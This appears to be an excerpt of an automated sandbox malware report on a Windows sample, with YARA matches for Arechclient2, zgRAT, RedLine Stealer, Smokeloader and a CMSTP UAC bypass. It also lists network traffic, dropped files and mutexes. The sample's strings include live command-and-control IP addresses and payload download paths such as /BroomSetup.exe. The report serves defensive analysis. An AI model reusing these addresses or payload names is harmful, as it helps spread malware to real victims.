                            Source: unknown, Network traffic detected: HTTP traffic on port 49728 -> 443
                            Source: unknown, Network traffic detected: HTTP traffic on port 49716 -> 443
                            Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49728
                            Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49716
                            Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49726
                            Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49703
                            Source: unknown, HTTPS traffic detected: 185.93.1.244:443 -> 192.168.2.5:49726 version: TLS 1.2

                            System Summary

                            Source: 6.2.UniversalInstaller.exe.3bbe15b.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 5.2.UniversalInstaller.exe.34ec86d.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 21.2.cmd.exe.53c00c8.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 21.2.cmd.exe.4dca976.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 20.2.UniversalInstaller.exe.373b15b.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 7.2.cmd.exe.53ab264.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 7.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 7.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 5.2.UniversalInstaller.exe.3530d5b.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 21.2.cmd.exe.4e0ee64.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 20.2.UniversalInstaller.exe.373bd5b.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 5.2.UniversalInstaller.exe.353015b.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 21.2.cmd.exe.4e0e264.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 20.2.UniversalInstaller.exe.36f786d.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 6.2.UniversalInstaller.exe.3bbed5b.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 21.2.cmd.exe.53c00c8.7.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 7.2.cmd.exe.5367976.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 24.2.MSBuild.exe.a00000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 7.2.cmd.exe.53abe64.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3514d525.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects zgRAT Author: ditekSHen
                            Source: 6.2.UniversalInstaller.exe.3b7a86d.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e35198739.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects zgRAT Author: ditekSHen
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e247a3.8.raw.unpack, type: UNPACKEDPE, Matched rule: Detects zgRAT Author: ditekSHen
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e1537d.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects zgRAT Author: ditekSHen
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e34dad.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects zgRAT Author: ditekSHen
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3517432f.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects zgRAT Author: ditekSHen
                            Source: 00000000.00000002.2435074573.00000000042ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                            Source: 00000002.00000002.2435628438.00000000043ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                            Source: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                            Source: 00000002.00000002.2435217330.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                            Source: C:\Users\user\AppData\Local\Temp\fak, type: DROPPED, Matched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\ypbquxnwo, type: DROPPED, Matched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe, Code function: 2_2_6C7AB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6C7AB700
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe, Code function: 2_2_6C7AB8C0 rand_s,NtQueryVirtualMemory,2_2_6C7AB8C0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe, Code function: 2_2_6C7AB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,2_2_6C7AB910
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe, Code function: 2_2_6C74F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6C74F280
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe, Code function: 4_2_0040EA54 NtQuerySystemInformation,4_2_0040EA54
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C75D9602_2_6C75D960
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C76A9402_2_6C76A940
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C77D9B02_2_6C77D9B0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C74C9A02_2_6C74C9A0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7851902_2_6C785190
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7A29902_2_6C7A2990
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C789A602_2_6C789A60
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C761AF02_2_6C761AF0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C78E2F02_2_6C78E2F0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C788AC02_2_6C788AC0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C75CAB02_2_6C75CAB0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7B2AB02_2_6C7B2AB0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7422A02_2_6C7422A0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C774AA02_2_6C774AA0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7BBA902_2_6C7BBA90
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C75C3702_2_6C75C370
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7453402_2_6C745340
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7B53C82_2_6C7B53C8
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C74F3802_2_6C74F380
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7FAC602_2_6C7FAC60
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C84ECD02_2_6C84ECD0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C8B6C002_2_6C8B6C00
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C8CAC302_2_6C8CAC30
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7EECC02_2_6C7EECC0
                            Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                            Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: String function: 004275A4 appears 43 times
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: String function: 04201D46 appears 39 times
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: String function: 04209F27 appears 48 times
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: String function: 042036F8 appears 130 times
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: String function: 00409CC0 appears 48 times
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: String function: 04201BE3 appears 40 times
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: String function: 0422780B appears 43 times
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: String function: 004043B0 appears 316 times
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: String function: 6C77CBE8 appears 134 times
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: String function: 6C7894D0 appears 88 times
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 1124
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 4BfhCycV4B.exe
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs 4BfhCycV4B.exe
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \OriginalFileName vs 4BfhCycV4B.exe
                            Source: 4BfhCycV4B.exe, 00000000.00000002.2435145473.00000000043A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFires( vs 4BfhCycV4B.exe
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameL vs 4BfhCycV4B.exe
                            Source: 4BfhCycV4B.exe, 00000000.00000002.2425971377.0000000004047000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFires( vs 4BfhCycV4B.exe
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2057767194.0000000005DEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFires( vs 4BfhCycV4B.exe
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2264464647.000000000434A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFires( vs 4BfhCycV4B.exe
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBCClipboard.exe> vs 4BfhCycV4B.exe
                            Source: 4BfhCycV4B.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 6.2.UniversalInstaller.exe.3bbe15b.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 5.2.UniversalInstaller.exe.34ec86d.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 21.2.cmd.exe.53c00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 21.2.cmd.exe.4dca976.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 20.2.UniversalInstaller.exe.373b15b.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 7.2.cmd.exe.53ab264.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 7.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 7.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 5.2.UniversalInstaller.exe.3530d5b.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 21.2.cmd.exe.4e0ee64.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 20.2.UniversalInstaller.exe.373bd5b.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 5.2.UniversalInstaller.exe.353015b.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 21.2.cmd.exe.4e0e264.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 20.2.UniversalInstaller.exe.36f786d.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 6.2.UniversalInstaller.exe.3bbed5b.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 21.2.cmd.exe.53c00c8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 7.2.cmd.exe.5367976.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 24.2.MSBuild.exe.a00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 7.2.cmd.exe.53abe64.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3514d525.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 6.2.UniversalInstaller.exe.3b7a86d.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e35198739.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e247a3.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e1537d.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e34dad.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3517432f.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 00000000.00000002.2435074573.00000000042ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                            Source: 00000002.00000002.2435628438.00000000043ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                            Source: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                            Source: 00000002.00000002.2435217330.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                            Source: C:\Users\user\AppData\Local\Temp\fak, type: DROPPEDMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: C:\Users\user\AppData\Local\Temp\ypbquxnwo, type: DROPPEDMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@26/78@5/7
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7A7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,2_2_6C7A7030
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_042EE29E CreateToolhelp32Snapshot,Module32First,0_2_042EE29E
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeMutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeMutant created: \Sessions\1\BaseNamedObjects\Global\BCClipboard {538F9E0A-E997-4AD2-8CB0-C8E991C010EF}
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5148
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6300
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeMutant created: \Sessions\1\BaseNamedObjects\BCClipboard {538F9E0A-E997-4AD2-8CB0-C8E991C010EF}
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeFile created: C:\Users\user\AppData\Local\Temp\u3z0.0.exeJump to behavior
                            Source: Yara matchFile source: 9.0.u3z0.1.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000003.2263644143.0000000006B16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000000.2257557220.0000000000401000.00000020.00000001.01000000.00000012.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u3z0.1.exe, type: DROPPED
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: one0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: two0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: three0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: four0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: five0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: six0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: seven0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: eight0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: nine0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: ten0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.900_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: Installed0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.2280_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.590_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /syncUpd.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /1/Qg_Appv5.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: Qg_Appv5.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /BroomSetup.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: @0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: one0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: two0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: five0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: seven0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: eight0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: nine0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: ten0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.900_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: Installed0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.2280_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.590_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /syncUpd.exe0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /1/Qg_Appv5.exe0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: Qg_Appv5.exe0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /BroomSetup.exe0_2_04224DA5
                            Source: 4BfhCycV4B.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
